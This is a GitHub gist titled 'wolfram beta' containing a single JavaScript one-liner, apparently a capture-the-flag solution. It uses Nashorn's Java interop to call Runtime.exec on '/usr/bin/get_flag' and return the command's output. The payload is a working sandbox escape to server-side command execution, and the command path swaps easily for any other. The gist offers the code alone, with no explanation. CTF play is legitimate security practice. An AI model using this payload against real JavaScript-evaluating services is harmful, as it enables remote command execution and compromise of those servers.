Created
December 15, 2017 10:23
-
-
Save chrismatix/b74bfa664cc97d23d66b2e90b549973d to your computer and use it in GitHub Desktop.
wolfram beta
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function () {try {var rt = Java.type('java.lang.Runtime').getRuntime();var Scanner = Java.type('java.util.Scanner');var s = new Scanner(rt.exec('/usr/bin/get_flag').getInputStream()).useDelimiter(' ');return s.hasNext() ? s.next() : '';} catch (e) {return e}})(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment